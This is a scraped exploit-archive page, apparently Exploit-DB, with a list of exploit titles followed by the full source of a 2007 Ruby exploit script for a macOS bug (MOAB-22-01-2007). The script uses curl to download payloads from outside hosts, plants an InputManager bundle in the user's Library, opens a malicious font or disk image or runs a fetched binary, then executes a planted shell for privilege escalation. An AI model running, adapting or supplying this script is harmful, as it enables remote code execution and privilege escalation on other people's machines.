
1979 changes to exploits/shellcodes Couchdb 1.5.0 - 'uuids' Denial of Service Apache CouchDB 1.5.0 - 'uuids' Denial of Service Beyond Remote 2.2.5.3 - Denial of Service (PoC) udisks2 2.8.0 - Denial of Service (PoC) Termite 3.4 - Denial of Service (PoC) SoftX FTP Client 3.3 - Denial of Service (PoC) Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection Silverstripe CMS 3.0.2 - Multiple Vulnerabilities SilverStripe CMS 3.0.2 - Multiple Vulnerabilities Silverstripe CMS 2.4 - File Renaming Security Bypass SilverStripe CMS 2.4 - File Renaming Security Bypass Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload Silverstripe CMS 2.4.x - 'BackURL' Open Redirection SilverStripe CMS 2.4.x - 'BackURL' Open Redirection Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure Silverstripe CMS - Multiple HTML Injection Vulnerabilities SilverStripe CMS - Multiple HTML Injection Vulnerabilities Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation Monstra CMS before 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (2) Monstra CMS < 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (1) Navigate CMS 2.8 - Cross-Site Scripting Collectric CMU 1.0 - 'lang' SQL injection Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection LG SuperSign EZ CMS 2.5 - Remote Code Execution MyBB Visual Editor 1.8.18 - Cross-Site Scripting Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection RICOH Aficio MP 301 Printer - Cross-Site Scripting Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection RICOH MP C6003 Printer - Cross-Site Scripting Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
44 lines
No EOL
1.7 KiB
Ruby
Executable file
44 lines
No EOL
1.7 KiB
Ruby
Executable file
#!/usr/bin/ruby
|
|
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
|
|
# Lance M. Havok <lmh [at] info-pull.com>
|
|
# All pwnage reserved.
|
|
#
|
|
# "Exploit" for MOAB-22-01-2007: All your crash are belong to us.
|
|
#
|
|
|
|
require 'fileutils'
|
|
|
|
bugselected = (ARGV[0] || 0).to_i
|
|
|
|
# INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz"
|
|
# keeping a local backup. /str0ke
|
|
INPUTMANAGER_URL = "https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3181.tar.gz"
|
|
INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" +
|
|
"mkdir -p ~/Library/InputManagers/;" +
|
|
"cd ~/Library/InputManagers/;" +
|
|
"tar -zxvf /tmp/moab_im.tar.gz"
|
|
|
|
case bugselected
|
|
when 0
|
|
target_url = "http://projects.info-pull.com/moab/bug-files/notification"
|
|
trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &"
|
|
when 1
|
|
target_url = "http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf"
|
|
trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf"
|
|
when 2
|
|
target_url = "http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz"
|
|
trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg"
|
|
end
|
|
|
|
CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}"
|
|
|
|
def escalate()
|
|
puts "++ Welcome to Pwndertino..."
|
|
system CMD_LINE
|
|
sleep 5
|
|
system "/Users/Shared/shX"
|
|
end
|
|
|
|
escalate()
|
|
|
|
# milw0rm.com [2007-01-23] |